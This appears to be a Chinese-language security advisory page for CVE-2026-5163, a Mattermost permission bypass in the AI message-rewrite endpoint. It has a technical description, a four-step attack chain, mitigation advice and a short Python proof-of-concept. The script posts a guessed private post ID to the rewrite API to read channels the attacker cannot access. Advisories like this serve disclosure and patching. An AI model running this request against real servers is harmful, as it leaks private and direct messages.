CVE-2026-5163 CVSS 6.5 中危

CVE-2026-5163 Mattermost权限绕过漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5163

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost版本11.5.x至11.5.1中存在一个安全漏洞。该漏洞源于系统在处理AI辅助的消息重写功能时，未能正确验证用户的频道成员身份。由于这一缺失，经过身份验证的攻击者可以通过向帖子重写端点发送精心构造的恶意请求，绕过访问限制，读取其本无权访问的私密频道及直接消息中的线程内容。此漏洞可能导致敏感信息泄露。

技术细节

该漏洞的技术核心在于Mattermost服务器端对于特定API端点的访问控制逻辑缺失。在Mattermost 11.5.x版本中，当用户请求对某条消息进行AI辅助重写时，系统会调用后端的帖子重写接口。正常情况下，获取帖子内容应当包含严格的权限检查，即请求者必须是该帖子所在频道的成员。然而，受影响版本的代码在处理此逻辑时，仅验证了用户的登录状态（低权限要求），却忽略了对目标频道成员资格的校验。因此，攻击者只要知道目标帖子的ID，即可利用该缺陷。攻击者构造一个包含目标帖子ID的请求发送至重写端点，服务器接收到请求后，会直接检索该帖子的原始内容用于AI处理，并在响应中返回处理后的结果（或原始内容，通常能泄露上下文）。由于缺乏成员资格验证，即使该帖子位于私密频道或直接消息中，攻击者也能成功读取，从而造成敏感数据泄露。

攻击链分析

STEP 1

信息收集

攻击者注册一个低权限账户并登录目标Mattermost系统。

STEP 2

枚举与猜测

攻击者尝试猜测或通过其他途径获取私密频道或直接消息中的帖子ID（Post ID）。

STEP 3

漏洞利用

攻击者向帖子重写端点发送包含目标Post ID的恶意POST请求，利用系统未校验频道成员身份的缺陷。

STEP 4

数据泄露

服务器返回重写后的消息内容（或原始上下文），攻击者成功读取无权访问的私密信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target Mattermost instance
TARGET_URL = "https://mattermost.example.com"
API_ENDPOINT = f"{TARGET_URL}/api/v4/posts/rewrite"

# Attacker's low-privilege session token
AUTH_TOKEN = "attacker_session_token_here"

# Headers
headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# The ID of a post located in a private channel the attacker cannot access
# This ID is usually obtained via enumeration or guessing
private_post_id = "PRIVATE_POST_ID_TO_LEAK"

# Crafted payload to trigger the rewrite functionality
payload = {
    "post_id": private_post_id
}

try:
    # Send the malicious request
    response = requests.post(API_ENDPOINT, json=payload, headers=headers)

    if response.status_code == 200:
        data = response.json()
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Leaked Post Content:")
        print(data.get('post', {}).get('message', 'Content not found in response'))
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Mattermost 11.5.x

Mattermost 11.5.1

防御指南

临时缓解措施

建议管理员立即检查Mattermost版本，如果受影响，应尽快应用官方发布的补丁或升级至修复版本。在升级完成前，可以考虑暂时禁用AI辅助消息重写功能以阻断攻击路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5163
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5163
3 Details https://www.cvedetails.com/cve/CVE-2026-5163/
4 VulDB https://vuldb.com/cve/CVE-2026-5163
5 Link https://mattermost.com/security-updates

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表